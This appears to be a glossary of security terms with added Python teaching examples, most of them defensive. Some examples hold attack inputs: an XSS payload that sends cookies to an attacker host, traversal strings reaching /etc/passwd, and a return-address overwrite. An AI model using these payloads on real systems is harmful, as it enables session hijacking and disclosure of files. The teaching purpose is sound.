Techopedia Definitions
Block Cipher
Definition - What does Block Cipher mean?
A block cipher is a symmetric cryptographic algorithm that operates on a fixed-size block of data (64 bits for DES, 128 bits for AES) using a shared, secret key. The unencrypted input is the plaintext, and the encrypted output is the ciphertext. The same key is used both to encrypt the plaintext and to decrypt the ciphertext.

Techopedia explains Block Cipher
A block cipher encrypts and decrypts its input one block at a time instead of one bit at a time, using a shared, secret key. Because the block size is fixed, input whose length is not a multiple of the block size must be padded (PKCS#7 is the usual scheme) or processed with a mode of operation, such as CTR, that does not need padding. The algorithm is symmetric: during encryption it uses the shared key to transform a plaintext block into a ciphertext block, and during decryption it uses the same key to transform the ciphertext block back into the original plaintext. Each block-cipher call produces an output block of the same length as its input block. On its own a block cipher handles only one block; longer messages are processed with a mode of operation (ECB, CBC, CTR, GCM). ECB mode encrypts each block independently, so identical plaintext blocks yield identical ciphertext blocks and patterns in the data leak through; an authenticated mode such as AES-GCM should be used in practice. Well-known block ciphers are the Data Encryption Standard (DES), whose 56-bit key is far too short for modern use, Triple DES, which is now deprecated, and the Advanced Encryption Standard (AES). The counterpart of the block cipher is the stream cipher, which operates on its input one bit or byte at a time, also using a shared key. An alternative to symmetric encryption is public-key (asymmetric) cryptography, which uses a public key to encrypt plaintext and a separate private key to decrypt the resulting ciphertext.
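The following is an added example, not code from the original page: a toy 64-bit Feistel block cipher built on SHA-256 that shows the properties described above (fixed block size, PKCS#7 padding, one key for both directions) and why the mode of operation matters. The construction and the 8-round/SHA-256 round function are assumptions for illustration only and are not secure; use AES in an authenticated mode for real data.

```python
# Added example, not from the original page: a toy 64-bit Feistel block cipher
# built on SHA-256 to show the properties described above (fixed block size,
# padding, one key for both directions, and why the mode of operation matters).
# The construction is for illustration only and is NOT secure; use AES in an
# authenticated mode (AES-GCM) in real systems.
import hashlib
import os

BLOCK = 8      # block size in bytes (64 bits, the same as DES)
ROUNDS = 8


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _f(half: bytes, key: bytes, rnd: int) -> bytes:
    # Round function: keyed hash of one half, truncated to 4 bytes.
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:4]


def encrypt_block(key: bytes, block: bytes) -> bytes:
    assert len(block) == BLOCK
    left, right = block[:4], block[4:]
    for rnd in range(ROUNDS):
        left, right = right, _xor(left, _f(right, key, rnd))
    return right + left          # final swap, as in DES


def decrypt_block(key: bytes, block: bytes) -> bytes:
    # Same key, rounds applied in reverse order: the Feistel structure lets
    # decryption reuse the identical round function.
    assert len(block) == BLOCK
    right, left = block[:4], block[4:]   # undo the final swap
    for rnd in reversed(range(ROUNDS)):
        left, right = _xor(right, _f(left, key, rnd)), left
    return left + right


def pad(data: bytes) -> bytes:
    # PKCS#7: append n bytes of value n so the length is a multiple of BLOCK.
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data: bytes) -> bytes:
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def blocks(data: bytes):
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


def encrypt_ecb(key: bytes, plaintext: bytes) -> bytes:
    # ECB: every block encrypted independently; equal blocks give equal output.
    return b"".join(encrypt_block(key, b) for b in blocks(pad(plaintext)))


def decrypt_ecb(key: bytes, ciphertext: bytes) -> bytes:
    return unpad(b"".join(decrypt_block(key, b) for b in blocks(ciphertext)))


def encrypt_cbc(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    # CBC: each block is XORed with the previous ciphertext block before
    # encryption, so repeated plaintext no longer produces repeated ciphertext.
    out, prev = [], iv
    for b in blocks(pad(plaintext)):
        prev = encrypt_block(key, _xor(b, prev))
        out.append(prev)
    return b"".join(out)


def decrypt_cbc(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    out, prev = [], iv
    for b in blocks(ciphertext):
        out.append(_xor(decrypt_block(key, b), prev))
        prev = b
    return unpad(b"".join(out))


if __name__ == "__main__":
    key = os.urandom(16)
    msg = b"AAAAAAAA" * 3           # three identical blocks, then a padding block
    print(blocks(encrypt_ecb(key, msg)))                 # repeated blocks visible
    print(blocks(encrypt_cbc(key, bytes(BLOCK), msg)))   # all different
```

Running the block prints the ECB ciphertext with three identical 8-byte blocks, which is exactly the pattern leak that makes ECB unsuitable, while the CBC output has no repeats.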
Buffer Overflow
Definition - What does Buffer Overflow mean?
A buffer overflow occurs when more data is written to a buffer than it can hold. The excess data is written to adjacent memory, overwriting whatever was stored there and causing unpredictable behaviour in the program. Buffer overflows happen when the length of the input is not validated (no bounds check) before the data is written. It is considered a bug or weakness in the software.

Techopedia explains Buffer Overflow
Attackers exploit a buffer overflow by supplying input that is longer than the buffer. The first part of the input fills the buffer; the rest spills into the memory next to it, which on the stack typically holds control data such as the saved return address, and on the heap holds allocator metadata or neighbouring objects. By choosing the overflowing bytes carefully, the attacker can overwrite a return address or function pointer so that execution jumps to code of the attacker's choosing, either machine code carried in the input itself (shellcode) or code already present in the process. The result ranges from a crash to full control of the program with the privileges it runs under.

Buffer overflows are among the most serious bugs an attacker can exploit, partly because they are hard to find and fix in code bases with millions of lines. The fixes themselves can be error-prone, so this class of bug is hard to eliminate entirely. Although programmers are aware of the threat, overflows continue to appear in both new and old software regardless of how many have already been fixed. Memory-safe languages, bounds-checked library calls, and compiler and operating-system mitigations such as stack canaries, non-executable memory and address space layout randomization reduce, but do not remove, the risk.
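The following is an added example, not code from the original page: a Python model of a C-style stack frame that makes the "excess data overwrites adjacent memory" effect visible without corrupting real memory. The frame layout (a 16-byte buffer followed by the saved frame pointer and the saved return address), the addresses and the payload are assumptions for illustration; real layouts depend on the compiler, platform and mitigations in use.

```python
# Added example, not from the original page: a Python model of a C-style stack
# frame, used to make the effect of an unchecked copy visible without actually
# corrupting memory. The layout (16-byte buffer, then the saved frame pointer,
# then the saved return address) is an assumption for illustration; real
# layouts depend on the compiler, platform and mitigations in use.
import struct

BUF_SIZE = 16
FRAME_FMT = f"<{BUF_SIZE}sQQ"   # buffer | saved frame pointer | return address
FRAME_SIZE = struct.calcsize(FRAME_FMT)


def make_frame(saved_fp: int, ret_addr: int) -> bytearray:
    return bytearray(struct.pack(FRAME_FMT, b"\x00" * BUF_SIZE, saved_fp, ret_addr))


def unchecked_copy(frame: bytearray, data: bytes) -> None:
    """Mimics strcpy(buf, data): every byte is written, no bounds check.
    Bytes beyond BUF_SIZE land in the saved frame pointer and return address."""
    n = min(len(data), len(frame))      # the model stops at the frame edge
    frame[0:n] = data[:n]


def checked_copy(frame: bytearray, data: bytes) -> None:
    """Mimics a bounded copy (strlcpy / snprintf with sizeof(buf)): the input is
    truncated to the buffer, so adjacent memory is never touched."""
    frame[0:BUF_SIZE] = data[:BUF_SIZE].ljust(BUF_SIZE, b"\x00")


def return_address(frame: bytearray) -> int:
    return struct.unpack(FRAME_FMT, bytes(frame))[2]


def saved_frame_pointer(frame: bytearray) -> int:
    return struct.unpack(FRAME_FMT, bytes(frame))[1]


def attacker_input(target: int) -> bytes:
    # Constructed payload: fill the buffer, clobber the saved frame pointer,
    # then overwrite the return address with an attacker-chosen value.
    return (b"A" * BUF_SIZE
            + struct.pack("<Q", 0x4242424242424242)
            + struct.pack("<Q", target))


if __name__ == "__main__":
    frame = make_frame(0x7FFD00001000, 0x400800)
    unchecked_copy(frame, attacker_input(0xDEADBEEF))
    print(hex(return_address(frame)))      # 0xdeadbeef: control of execution
    frame = make_frame(0x7FFD00001000, 0x400800)
    checked_copy(frame, attacker_input(0xDEADBEEF))
    print(hex(return_address(frame)))      # 0x400800: unchanged
```

In a real process the overwritten return address is used when the function returns, which is the moment the attacker's value takes over the instruction pointer; the bounded copy leaves the control data intact and at worst truncates the input.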
Cross Site Scripting (XSS)
Definition - What does Cross Site Scripting (XSS) mean?
Cross-site scripting (XSS) is the injection of attacker-controlled script into a genuine website so that it runs in other users' browsers with the site's identity, usually to gather the victim's information or act on the victim's behalf. XSS attacks are possible through security vulnerabilities in web applications that place untrusted input into a page without encoding it, and are commonly exploited by injecting a client-side script. JavaScript is almost always used; historically attackers also used VBScript, ActiveX or Flash, which modern browsers no longer support.

Techopedia explains Cross Site Scripting (XSS)
When an XSS vulnerability is successfully exploited, it is the application's users rather than the server that are exposed: the injected script runs in the victim's browser with the same origin as the legitimate site. For instance, users can be duped into executing malicious scripts when viewing dynamically generated pages, whether the script is reflected from the request or stored in the site's data. Another possibility involves an attacker taking over a user session by reading the session cookie before it expires. In yet another case, innocent users can be redirected to a malicious server. In practically all scenarios the attack runs with the victim's own privileges. Such attacks can then evolve into account hijacking, cookie theft, false advertising and modification of the settings of the victim's account.

One way of mitigating the risk of XSS is turning off active scripting in the browser; unfortunately this also removes the browser's ability to run dynamic websites and is not a realistic solution for most users. The effective fix is on the server side: encode untrusted data for the context in which it is inserted (HTML body, attribute, JavaScript or URL), and add defence in depth with a Content Security Policy and HttpOnly session cookies.
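The following is an added example, not code from the original page: a server-side comment renderer that interpolates user input raw, beside one that encodes it for the HTML body and attribute contexts. The page fragments, the attacker host name and both payloads are constructed for this illustration.

```python
# Added example, not from the original page: how untrusted input becomes XSS
# when pasted into HTML, and how context-aware encoding neutralises it.
# The page fragments and the payloads are constructed for this example.
import html

# Constructed attacker input: a comment that would send the session cookie
# to an attacker-controlled host.
PAYLOAD = '<script>new Image().src="https://attacker.invalid/?c="+document.cookie</script>'
# Constructed attacker input aimed at an attribute context: close the quote,
# then add an event handler.
ATTR_PAYLOAD = '" onmouseover="alert(document.cookie)'


def render_comment_vulnerable(author: str, comment: str) -> str:
    # Raw string interpolation: whatever the user typed becomes part of the DOM.
    return f"<p><b>{author}</b>: {comment}</p>"


def render_comment_safe(author: str, comment: str) -> str:
    # HTML body context: escape <, >, & and quotes so the browser shows the
    # text instead of parsing it as markup.
    return f"<p><b>{html.escape(author)}</b>: {html.escape(comment)}</p>"


def render_title_attr_vulnerable(title: str) -> str:
    return f'<a href="/post/1" title="{title}">post</a>'


def render_title_attr_safe(title: str) -> str:
    # Attribute context: quote=True turns " into &quot; so the attribute cannot
    # be closed early. Attribute values must also always be quoted.
    return f'<a href="/post/1" title="{html.escape(title, quote=True)}">post</a>'


def contains_script_tag(markup: str) -> bool:
    # Crude check used only to show the difference between the two renderers;
    # it is not a sanitizer and must not be used as one.
    return "<script" in markup.lower()


if __name__ == "__main__":
    print(render_comment_vulnerable("mallory", PAYLOAD))
    print(render_comment_safe("mallory", PAYLOAD))
    print(render_title_attr_vulnerable(ATTR_PAYLOAD))
    print(render_title_attr_safe(ATTR_PAYLOAD))
```

The safe attribute renderer still contains the literal text onmouseover= in its output, but it stays inside the quoted title value where the browser treats it as data; the point of encoding is not to strip words but to keep untrusted text from changing the structure of the page.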
DNS poisoning
Definition - What does DNS Cache Poisoning mean?
DNS cache poisoning is a process by which the records held by a DNS resolver are illegitimately modified so that a domain name resolves to an address of the attacker's choosing instead of the genuine one. Attackers use it to redirect visitors of a particular website to a site they control. DNS cache poisoning is also known as DNS spoofing.

Techopedia explains DNS Cache Poisoning
A recursive DNS server caches the answers it receives so that later queries can be served without contacting the authoritative servers again. Cache poisoning works by getting a forged answer into that cache. The attacker may compromise the server and edit its records directly, or, more commonly, send forged responses to the resolver that arrive before the legitimate reply; to be accepted, a forged response must match the outstanding query's transaction ID, destination port and question, so resolvers that use predictable IDs or a fixed source port are easy targets. Once the forged record is cached, it maps the domain name to the IP address of the attacker's site, which may serve spam, malware or a look-alike phishing page. Every user of the poisoned resolver who visits the target website is sent to the attacker's site for as long as the record's time to live lasts. Defences include randomizing transaction IDs and source ports, accepting only records that belong to the zone being queried, and validating answers with DNSSEC.
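The following is an added example, not code from the original page: a simplified model of the checks a recursive resolver applies before caching an answer (transaction ID and source port match, and the record lies within the zone being queried), with a blind spoofing attempt run against it. The names, addresses and zone layout are constructed; real resolvers also check the question section, TTLs and DNSSEC signatures.

```python
# Added example, not from the original page: a simplified model of the checks a
# recursive resolver applies before caching an answer, and how a forged reply
# fares against them. Names, addresses and the zone layout are constructed;
# real resolvers also check the question section, TTLs and DNSSEC signatures.
import secrets


class Resolver:
    def __init__(self):
        self.cache = {}     # name -> address
        self.pending = {}   # txid -> (qname, zone, source port)

    def send_query(self, qname: str, zone: str):
        # Random 16-bit transaction ID and random source port: an attacker who
        # cannot observe the query must guess both (about 2^32 combinations).
        txid = secrets.randbelow(1 << 16)
        port = 1024 + secrets.randbelow(65536 - 1024)
        self.pending[txid] = (qname, zone, port)
        return txid, port

    @staticmethod
    def in_bailiwick(name: str, zone: str) -> bool:
        # Only records at or below the zone being queried are accepted, so a
        # reply for www.example.com cannot plant a record for another zone.
        return name == zone or name.endswith("." + zone)

    def receive(self, txid: int, dst_port: int, records) -> bool:
        """records: list of (name, address). Returns True if anything was cached."""
        entry = self.pending.get(txid)
        if entry is None or entry[2] != dst_port:
            return False            # txid/port mismatch: forged or stale reply
        qname, zone, _ = entry
        cached = False
        for name, addr in records:
            if self.in_bailiwick(name, zone):
                self.cache[name] = addr
                cached = True
        if cached:
            del self.pending[txid]
        return cached

    def resolve(self, name: str):
        return self.cache.get(name)


def spoof_attempt(resolver: Resolver, qname: str, guesses: int, fake_addr: str) -> bool:
    # Off-path attacker blindly sends `guesses` forged replies with random
    # txid/port, hoping one lands before the genuine answer.
    for _ in range(guesses):
        txid = secrets.randbelow(1 << 16)
        port = 1024 + secrets.randbelow(65536 - 1024)
        if resolver.receive(txid, port, [(qname, fake_addr)]):
            return True
    return False


if __name__ == "__main__":
    r = Resolver()
    txid, port = r.send_query("www.example.com", "example.com")
    print("blind spoof succeeded:", spoof_attempt(r, "www.example.com", 1000, "203.0.113.66"))
    print("genuine reply cached:", r.receive(txid, port, [("www.example.com", "192.0.2.10")]))
    print(r.resolve("www.example.com"))
```

With only the 16-bit transaction ID randomized (a fixed source port), the attacker's odds per forged packet rise by a factor of about 64,000, which is why source port randomization is a required mitigation rather than an optional one.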
Data Loss Prevention (DLP)
Definition - What does Data Loss Prevention (DLP) mean?
Data loss prevention (DLP) refers to the identification and monitoring of sensitive data to ensure that it is only accessed by authorized users and that there are safeguards against data leaks. Insider threats and more stringent state privacy laws drove the adoption of DLP from around 2006.

Techopedia explains Data Loss Prevention (DLP)
DLP is a method of inspecting sensitive data and keeping it from leaving the allowed perimeter. Network DLP systems are concerned with data passing over some kind of perimeter gateway device, such as email, instant messages and web applications; endpoint DLP agents apply the same inspection on individual machines. DLP has the following key features:
- It is configurable with automated remediation, which can significantly reduce the cost of responding to an incident. The automatic action may differ depending on the kind of activity involved: for an email, for instance, the policy may encrypt, quarantine or block the message and/or notify the sender. Most of these functions could also be performed by a secure email product.
- It can move data to a safe location if the data is found in an unprotected area.
- It removes the need for manual user lookups by integrating with an LDAP server or Active Directory. This feature is common to all DLP vendors.
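The following is an added example, not code from the original page: the inspection and automated-remediation step of a DLP gateway, run over a constructed set of outbound emails. The two detectors (payment card numbers confirmed with the Luhn check, and US Social Security number format), the policy table mapping each data class to block/encrypt/allow, and the sample messages are all assumptions for this illustration.

```python
# Added example, not from the original page: the inspection and automated
# remediation step of a DLP gateway, run over constructed outbound messages.
# The detectors (payment card numbers validated with the Luhn check, and
# US Social Security number format) and the policy table are illustrative.
import re

CARD_RE = re.compile(r"\b(?:\d[ -]?){13,16}\b")
SSN_RE = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")


def luhn_ok(digits: str) -> bool:
    # Luhn checksum: rejects most random digit strings that merely look like cards.
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_sensitive(text: str) -> dict:
    found = {"card": [], "ssn": []}
    for m in CARD_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if 13 <= len(digits) <= 16 and luhn_ok(digits):
            found["card"].append(digits)
    found["ssn"] = SSN_RE.findall(text)
    return found


# Policy: what the gateway does with an outbound email per data class.
POLICY = {"card": "block", "ssn": "encrypt"}
SEVERITY = {"allow": 0, "encrypt": 1, "quarantine": 2, "block": 3}


def decide(message: dict) -> str:
    """Return the most severe remediation action triggered by the message body."""
    found = find_sensitive(message["body"])
    action = "allow"
    for kind, hits in found.items():
        if hits and SEVERITY[POLICY[kind]] > SEVERITY[action]:
            action = POLICY[kind]
    return action


# Constructed sample of outbound mail.
OUTBOUND = [
    {"to": "partner@example.net", "body": "Invoice attached, PO 1234567890123456."},
    {"to": "me@webmail.example", "body": "Card 4111 1111 1111 1111 exp 12/29, keep safe"},
    {"to": "hr@example.com", "body": "New hire SSN 123-45-6789, start Monday"},
    {"to": "team@example.com", "body": "Lunch at noon?"},
]


def scan_all(messages=OUTBOUND):
    return [(m["to"], decide(m)) for m in messages]


if __name__ == "__main__":
    for recipient, action in scan_all():
        print(f"{action:8} -> {recipient}")
```

The purchase-order number in the first message is sixteen digits but fails the Luhn check, so it is not flagged; validating the checksum is what keeps a pattern-based DLP rule from blocking every invoice and tracking number.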
Directory Traversal
Definition - What does Directory Traversal mean?
Directory traversal is a web application vulnerability that enables an attacker to read files, and sometimes write files or run commands, outside the directory the web server is supposed to serve (the web root). It is used to access restricted content or files on a web server. Directory traversal is also known as path traversal, the ../ attack (dot-dot-slash attack), directory climbing and backtracking.

Techopedia explains Directory Traversal
Directory traversal is primarily a type of attack in which the attacker induces the server to step up into a parent directory or expose server-specific files. It generally happens as a result of missing or insufficient validation in the code of the application hosted on the web server. The attacker typically sends an HTTP request whose path or parameter contains a series of ../ sequences, often URL-encoded (%2e%2e%2f) or otherwise disguised to slip past naive filters. If the application does not validate the input before using it to build a file path, the operating system resolves the ../ components and the request is served from a directory above the web root, exposing internal and restricted directories and the data they contain. Once the attacker can reach the parent directory, he or she can read configuration files, source code and credentials, and, where the application writes files or passes the path to a shell, modify or delete files or even execute specific commands. The defence is to canonicalize the requested path and confirm that it lies inside the intended base directory, or to map user input onto an allowlist of known files rather than using it as a path at all.
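The following is an added example, not code from the original page: a file-serving helper that is vulnerable to ../ traversal beside one that decodes, canonicalizes and confirms the path stays under the web root. The web root path and the request strings (attack and benign) are assumptions constructed for this illustration.

```python
# Added example, not from the original page: a file-serving helper that is
# vulnerable to ../ traversal next to one that canonicalises the path and
# confirms it stays under the web root. The web root path is an assumption;
# the request strings are constructed attack and benign inputs.
import os
import urllib.parse

WEB_ROOT = "/var/www/static"    # assumed document root


def vulnerable_path(base: str, requested: str) -> str:
    # Joins user input straight onto the base directory; normpath then happily
    # collapses ../ segments and walks out of the web root. An absolute
    # request path even replaces the base entirely (os.path.join semantics).
    return os.path.normpath(os.path.join(base, requested))


def resolve_safely(base: str, requested: str) -> str:
    """Return the absolute path to serve, or raise ValueError if the request
    would escape `base`."""
    decoded = urllib.parse.unquote(requested)      # handle %2e%2e%2f and friends
    if "\x00" in decoded:
        raise ValueError("NUL byte in path")       # classic filter-bypass trick
    if os.path.isabs(decoded):
        raise ValueError("absolute path not allowed")
    base_real = os.path.realpath(base)
    # realpath resolves ../ and symlinks, so the check sees the final location.
    target = os.path.realpath(os.path.join(base_real, decoded))
    if os.path.commonpath([base_real, target]) != base_real:
        raise ValueError("path escapes web root: %r" % requested)
    return target


def is_safe(base: str, requested: str) -> bool:
    try:
        resolve_safely(base, requested)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for req in ["css/site.css", "../../../etc/passwd",
                "%2e%2e/%2e%2e/%2e%2e/etc/passwd", "images/../../secret.txt",
                "/etc/passwd", "css/site.css%00../../etc/passwd"]:
        print(f"{req:40} naive -> {vulnerable_path(WEB_ROOT, req):28} safe? {is_safe(WEB_ROOT, req)}")
```

Decoding once before the check matters: a filter that looks for the literal string ../ in the raw request is bypassed by %2e%2e%2f, while a check that runs after decoding and canonicalization sees the real target. Checking the prefix with os.path.commonpath rather than a string startswith avoids accepting /var/www/static-private as being inside /var/www/static.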
Hardening
Definition - What does Hardening mean?
Hardening refers to providing various means of protection in a computer system. Protection is provided in various layers and is often referred to as defense in depth. Protecting in layers means to protect at the host level, the application level, the operating system level, the user level, the physical level and all the sublevels in between. Each level requires a unique method of security. A hardened computer system is a more secure computer system. Hardening is also known as system hardening.

Techopedia explains Hardening
Hardening's goal is to eliminate as many risks and threats to a computer system as possible. Hardening activities for a computer system can include:
- Keeping security patches and hot fixes updated
- Monitoring security bulletins that are applicable to the system's operating system and applications
- Installing a firewall
- Closing unnecessary ports and disabling unneeded services
- Not allowing file sharing among programs
- Installing virus and spyware protection, including an anti-adware tool, so that malicious software cannot gain a foothold on the computer
- Keeping a backup of the system, for example on a separate hard drive
- Disabling cookies
- Creating strong passwords
- Never opening emails or attachments from unknown senders
- Removing unnecessary programs and user accounts from the computer
- Using encryption where possible
- Hardening security policies, such as local policies governing how often a password must be changed and how long and in what format it must be
Hot Fix
Definition - What does Hot Fix mean?
A hot fix is a repair applied to a working computer or system component, such as a running program, typically to correct a specific problem outside the regular release cycle. Hot fixes address both critical and non-critical issues and should be applied as soon as they are released to prevent the performance degradation, instability or exposure caused by unaddressed bugs or security holes. A regular hot fix schedule shields against OS bugs and attacks.

Techopedia explains Hot Fix
Microsoft has released hot fixes alongside regular Windows updates (historically for Windows XP) or to address specific and unexpected OS bugs. Windows hot fixes are available for download from Microsoft's website or via the built-in Windows Update utility, which automatically downloads and installs them. Users should back up their data before installing hot fixes or updates to safeguard against the machine becoming inoperable.
Man-in-the-middle
Definition - What does Man-in-the-Middle Attack (MITM) mean?
A man-in-the-middle (MITM) attack is a form of eavesdropping in which communication between two parties is relayed through, and possibly modified by, an unauthorized third party while both parties believe they are talking directly to each other. In one classic form, the attacker intercepts a public key exchange and forwards the messages after replacing the exchanged key with his own, so that each party unknowingly encrypts to the attacker instead of to its peer. The sender does not notice that the receiver is an attacker who reads or modifies the message before retransmitting it to the real receiver. Thus the attacker controls the entire communication. The term is also known as a janus attack or a fire brigade attack.

Techopedia explains Man-in-the-Middle Attack (MITM)
MITM is named for a ball game in which two people play catch while a third person in the middle attempts to intercept the ball. MITM is also known as a fire brigade attack, a term derived from the emergency practice of passing water buckets along a line to put out a fire. The MITM intercepts communications between two systems and is performed when the attacker sits on, or controls, a point that traffic normally passes through, such as a router, a Wi-Fi access point or a compromised host on the local network; the attacker is often on the same broadcast domain as the victim. For instance, in an HTTP transaction a TCP connection exists between client and server. The attacker splits it into two connections: one between the victim and the attacker and the other between the attacker and the server. Acting as a proxy, the attacker reads, alters and inserts data in the intercepted communication; a session cookie carried in the HTTP headers is trivially captured. In an HTTPS connection the attacker would have to establish two independent TLS connections, one with each side, and present the victim with a certificate for the server; this only succeeds if the victim's client does not validate the certificate or the attacker controls a certificate authority the client trusts, which is why certificate validation and pinning are the main defence.

An MITM attack on a local network exploits weaknesses in the network protocols to convince the victim to route traffic through the attacker instead of the normal router. The most common technique, ARP spoofing, sends forged ARP replies that associate the gateway's IP address with the attacker's MAC address, so the victim's frames for the gateway are delivered to the attacker, who forwards them on after inspection.
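The following is an added example, not code from the original page: detection of the ARP spoofing that usually precedes a local-network MITM, run over a constructed capture of ARP replies. The IP addresses, MAC addresses and the known gateway binding are made up for this illustration; in practice the expected gateway MAC comes from inventory or the DHCP server.

```python
# Added example, not from the original page: detection of the ARP spoofing that
# usually precedes a local-network MITM, run over a constructed capture of ARP
# replies. Addresses, MACs and the known gateway binding are all made up.
from collections import defaultdict

GATEWAY_IP = "192.168.1.1"
GATEWAY_MAC = "00:11:22:33:44:55"     # assumed: the real gateway, from DHCP/inventory

# Constructed ARP replies as (time, sender IP, sender MAC). The attacker
# (MAC de:ad:be:ef:00:01) claims both the gateway and the victim so that it
# sits in the middle of their traffic.
ARP_REPLIES = [
    (0.0, "192.168.1.1",  "00:11:22:33:44:55"),
    (0.5, "192.168.1.20", "aa:bb:cc:dd:ee:20"),
    (1.0, "192.168.1.1",  "de:ad:be:ef:00:01"),
    (1.0, "192.168.1.20", "de:ad:be:ef:00:01"),
    (2.0, "192.168.1.1",  "de:ad:be:ef:00:01"),
]


def detect_arp_spoofing(replies, gateway_ip=GATEWAY_IP, gateway_mac=GATEWAY_MAC):
    """Return a list of (time, reason, ip, mac) alerts."""
    macs_for_ip = defaultdict(set)
    ips_for_mac = defaultdict(set)
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        # 1. The gateway must always answer with its known MAC.
        if ip == gateway_ip and mac != gateway_mac.lower():
            alerts.append((ts, "gateway-mac-changed", ip, mac))
        # 2. One IP answering with two different MACs is the classic sign.
        if macs_for_ip[ip] and mac not in macs_for_ip[ip]:
            alerts.append((ts, "ip-mac-conflict", ip, mac))
        macs_for_ip[ip].add(mac)
        # 3. One MAC claiming several IPs (gateway and victim) is poisoning both ends.
        if ips_for_mac[mac] and ip not in ips_for_mac[mac]:
            alerts.append((ts, "mac-claims-multiple-ips", ip, mac))
        ips_for_mac[mac].add(ip)
    return alerts


def suspect_macs(replies) -> set:
    return {mac for _, _, _, mac in detect_arp_spoofing(replies)}


if __name__ == "__main__":
    for alert in detect_arp_spoofing(ARP_REPLIES):
        print(alert)
```

Rule 1 is the strongest signal on a managed network where the gateway MAC is known; rules 2 and 3 catch the same behaviour without prior knowledge but will also fire on legitimate events such as a replaced NIC or a failover pair, so they are best treated as leads to correlate rather than automatic blocks.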
Security Patch
Definition - What does Patch mean?
A patch is a software update comprising code inserted (or "patched") into the code of an executable program. Typically a patch is installed into an existing software program. Patches are often temporary fixes between full releases of a software package. Patches may do any of the following:
- Fix a software bug
- Install new drivers
- Address new security vulnerabilities
- Address software stability issues
- Upgrade the software

Techopedia explains Patch
Software patches can be free or available for sale. Some companies deliver patches to registered users only. Patches are usually available as Internet downloads. If the original source code is proprietary and not released to the general public, patches are released as executable binary code. Patches alter the existing program by modifying parts of it or replacing it completely. Patches have become extremely important as a way of updating programs in response to the new security threats that appear regularly, especially in online environments. Formerly patches were installed manually; today automatic updates are very popular and are available as self-installing packages from the vendor's support pages. Although patches can vary in size from several kilobytes to hundreds of megabytes, they are usually perceived as being rather small. On Microsoft Windows, large patches are generally named service packs and can be over 100 MB.
Replay Attack
Definition - What does Replay Attack mean?
A replay attack is a category of network attack in which an attacker captures a valid data transmission and fraudulently delays or repeats it. The delayed or repeated transmission is carried out either by the original sender or by a malicious party who intercepts the data and retransmits it. In other words, a replay attack is an attack on a security protocol that reuses an earlier valid transmission, fed to the receiving system from a different sender, so that the participants believe a new, genuine exchange has completed. Replay attacks help attackers gain access to a network, obtain information that would not otherwise be accessible or complete a duplicate transaction. A replay attack is also known as a playback attack.

Techopedia explains Replay Attack
Unless mitigated, networks and computers subject to a replay attack treat the replayed packets as legitimate messages. One example is an attacker replaying to the network a message that was earlier sent by an authorized user. Although the messages may be encrypted and the attacker may never learn the keys, retransmitting valid data or logon messages can be enough to gain access: replaying an authentication message can grant the attacker the resources the original user was granted and confuse the destination host. One of the best techniques for averting replay attacks is a strong digital signature or message authentication code over a message that includes a timestamp, with the receiver rejecting anything outside a short freshness window. Another is random session keys or nonces that are time-bound and process-bound, so a message from one session is meaningless in another. A one-time password for each request also prevents replays and is frequently used in banking operations. Other techniques include sequence numbers on messages and rejection of any duplicate.
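The following is an added example, not code from the original page: the timestamp plus nonce plus message authentication code pattern described above, with a receiver that rejects tampered, stale, replayed and malformed messages. The shared key, the 30-second freshness window and the pipe-delimited message format are assumptions for this illustration.

```python
# Added example, not from the original page: the timestamp + nonce + message
# authentication code pattern described above, with a receiver that rejects
# tampered, stale and replayed messages. The shared key, the 30-second window
# and the message format are assumptions for this illustration.
import hashlib
import hmac
import secrets
import time

SHARED_KEY = b"example-shared-secret"   # assumed pre-shared key
FRESHNESS_WINDOW = 30                   # seconds of clock skew tolerated


def make_message(key: bytes, payload: str, now=None, nonce=None) -> str:
    """Sender side: timestamp | nonce | payload | HMAC-SHA256 over the first three."""
    now = int(time.time()) if now is None else now
    nonce = secrets.token_hex(8) if nonce is None else nonce
    body = f"{now}|{nonce}|{payload}"
    tag = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}|{tag}"


class Receiver:
    def __init__(self, key: bytes, window: int = FRESHNESS_WINDOW):
        self.key = key
        self.window = window
        self.seen = {}   # nonce -> timestamp, so replays within the window are caught

    def accept(self, message: str, now=None):
        """Returns (True, payload) or (False, reason)."""
        now = int(time.time()) if now is None else now
        try:
            body, tag = message.rsplit("|", 1)
            ts_text, nonce, payload = body.split("|", 2)
            ts = int(ts_text)
        except ValueError:
            return False, "malformed"
        expected = hmac.new(self.key, body.encode(), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(tag, expected):
            return False, "bad signature"       # tampered, or wrong key
        if abs(now - ts) > self.window:
            return False, "stale"               # outside the freshness window
        if nonce in self.seen:
            return False, "replay"              # same nonce seen before
        self.seen[nonce] = ts
        # Forget nonces older than the window: they can no longer pass the
        # staleness check, so keeping them only wastes memory.
        self.seen = {n: t for n, t in self.seen.items() if now - t <= self.window}
        return True, payload


if __name__ == "__main__":
    msg = make_message(SHARED_KEY, "transfer 100 to acct 42", now=1000, nonce="n1")
    r = Receiver(SHARED_KEY)
    print(r.accept(msg, now=1005))                          # (True, payload)
    print(r.accept(msg, now=1010))                          # (False, 'replay')
    print(r.accept(msg.replace("100", "900"), now=1005))    # (False, 'bad signature')
```

The signature check runs before the freshness and nonce checks so that unauthenticated input cannot fill the nonce table; the timestamp bounds how long nonces must be remembered, and the nonce catches a replay inside that window, which a timestamp alone cannot.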
SQL Injection
Definition - What does SQL Injection mean?
SQL injection is an attack in which malicious input is embedded in a poorly designed application and passed to the backend database as part of an SQL statement. The malicious data then produces database query results or actions that should never have been executed.

Techopedia explains SQL Injection
